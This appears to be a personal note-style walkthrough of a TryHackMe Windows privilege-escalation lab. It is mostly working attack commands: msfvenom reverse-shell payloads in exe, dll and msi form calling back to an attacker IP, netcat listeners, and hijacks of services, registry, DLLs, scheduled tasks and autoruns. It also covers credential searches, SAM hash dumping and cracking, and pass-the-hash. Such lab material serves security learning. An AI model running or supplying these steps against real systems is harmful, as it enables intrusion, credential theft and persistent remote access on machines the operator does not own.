913 words

5 minutes

Windows PrivEsc

2025-02-22

Notes

/

THM

/

windows

start with rdp

1
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.130.87

enerate a Reverse Shell Executable#

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.5.46 LPORT=53 -f exe -o reverse.exe
2
# on kali
3
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
4
# on windows
5
copy \\10.9.5.46\kali\reverse.exe C:\PrivEsc\reverse.exe
6
# setting listner
7
sudo nc -nvlp 53
8
# execute the program and u will get reverse shell
9
# to escalate from Admin -> System
10
.\PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe

Tools#

for enumeration use PowerUp, SharpUp, WinPeas.

PowerUp#

1
. .\PowerUp.ps1
2
Invoke-allChecks

powerUp

from here we can see interisting staff like unquoted file path

unquoted

SharpUp#

1
.\SharpUp.exe

it return similar output as PowerUp

Seatbelt#

1
.\Seabelt.exe # it will return the help

WinPeas#

1
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
2
.\winPeaSany.exe

Kernel Exploit#

1
systeminfo

then use wesng, windows-kernel-exploits or watson

Service Exploits#

Insecure Service Permissions#

1
# Service Commands
2
sc.exe qc <name> # Query the configuration of a service
3
sc.exe query <name> # Query the current status of a service
4
sc.exe config <name> <option>= <value> # Modify a configuration option of a service
5
net start/stop <name> # Start/Stop a Service

from winpeas we can do

1
.\WinPEASany.Exe quiet serviceinfo
2
# we can confirm that with
3
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

sc.exeConfig

set the binpath to our reverse shell

setup our listner

1
nc -lvnp 53

start the service

1
net start dacksvc

and we did it

Unquoted Service Path#

from winpeas, PowerView we can see there is unquoted service path

1
# Checking service Configuration
2
sc qc unquotedsvc
3
# using accesschk.exe to check our permission in folders
4
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\ "
5
# we have Permission to RW

unquotedfolder

so lets change it to our reverse.exe

after runing the program u should get shell

1
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
2
net start unquotedsvc

revshell

Weak Registry Permissions#

from winpeas we can see we can modify a registry

reg

we can verify the permission using powershell or accesschk

1
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
2
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
3
# we are part of Authority\Interactive Group
4
.\accesschk.exe /accepteula -ucqv user regsvc
5
# check the current value in regsvc
6
reg query HKLM\System\CurrentControlSet\Services\regsvc

we can change the ImagePath Value to our reverse.Exe

1
# change the Value
2
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
3
# check
4
reg query HKLM\System\CurrentControlSet\Services\regsvc
5
# start the service
6
net start regsvc

Insecure Service Executables#

as regular from winpeas

using acceschk

1
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
2
C:\PrivEsc\accesschk.exe /accepteula -uvqc filepermsvc
3
# we have start access

backup the file then change it with ur reverse.exe

1
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
2

3
net start filepermsvc

DLL Hijacking#

From winPEAS output we can see list of no-microsoft services and the check for DLL Hijacking in Path folders we have write permission in C:\Temp

Check if u have write permissions in PATH folders
Check which services u have start and stop permission accesschk.exe /accepteula -uvqc user dllsvc
pick the binary to ur machine where u have admin privilege for analysis Procmon64.exe

as u can see the process cant find the hijackme dll and one of the folder it look at is where we have write permission

lets generate our reverse.dll

1
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.5.46 lport=53 -f dll -o hijackme.dll
2
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
3
> copy \\10.9.5.46\kali\hijackme.dll C:\temp\hijackme.dll
4
$ nc -lvnp 53
5
> net start dllsvc

Registry#

AutoRuns#

from winpeas output in AutoRuns output we can see there is program everyone has access to

autorun

we can Query the registry for AutoRun executables

1
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

and check if we have write permission

1
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

accesccchk

so now we can overwrite the Executable by our reverse.exe

1
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

windows when start will autorun the program with the last user privilege, in our case will be us so we will get normal shell, but if admin login then we reboot the system we can get shell

AlwaysInstallElevated#

from winpeas

winpeas

let’s query this manualy with

1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

from kali lets generate reverse.msi

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.5.46 LPORT=53 -f msi -o reverse.msi
2
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
3
nc -lvnp 53

in windows

1
copy \\10.9.5.46\kali\reverse.msi C:\PrivEsc\reverse.msi
2
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Passwords#

Registry#

winpeas can help with that and we can query it manualy with

1
reg query HKLM /f password /t REG_SZ /s
2
reg query HKCU /f password /t REG_SZ /s
3
# Or query specific key
4
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On kali we can spawn CMD with winexe

1
winexe -U 'admin%password' //10.10.78.130 cmd.exe/powershell.exe
2
# add --system for system shell

Saved Creds#

1
cmdkey /list

cmdkey

we can see admin credentiels are saved

now we can use runas to get reverse shell

1
runas /savecred /user:admin C:\PrivEsc\reverse.exe

Configuration Files#

1
dir /s *pass* == *.config
2
# or
3
findstr /si password *.xml *.ini *.txt

from winpeas we can see there is credentiels in unattend.xml

unattend

SAM#

from winpeas we can see its locate the SAM and SYSYEM files

sam

copy the two files to ur kali

copy

with

creddump7

1
creddump7
2
python pwdump.py ~/Path/To/SYSTEM ~/Path/To/SAM
3
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Pass The hash#

we can use pth-winexe with the hash we found earlier to do pass the hash

1
pth-winexe -U 'admin%hash' //10.10.78.130 cmd.exe

pth

Scheduled Tasks#

we can list all scheduled tasks that our user can see with

1
schtasks /query /fo LSIT /v

but here we can rely in enumerating the system and looking for files indecate schedule task like C:\DevTools\CleanUp.ps1 script in our case

1
type C:\DevTools\CleanUp.ps1

check if we have write permission

1
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

we have write access so start our listner nc -lvnp 53

and append the reverse.exe to the scirpt :

1
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Wait for the Scheduled Task to run, and u will get reverse shell

Insecure GUI Apps#

if we run the paint in the desktop and run

1
tasklist /V | findstr mspaint.exe

we can see that the paint is runing as admin, so as the process follow their parrent we can use it to open admin cmd

from open write in search bar file://C:/windows/system32/cmd.exe

Startup Apps#

start with checking if we have write access to StartUp directory

1
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

create vps script

1
Set oWS = WScript.CreateObject("WScript.Shell")
2
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
3
Set oLink = oWS.CreateShortcut(sLinkFile)
4
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
5
oLink.Save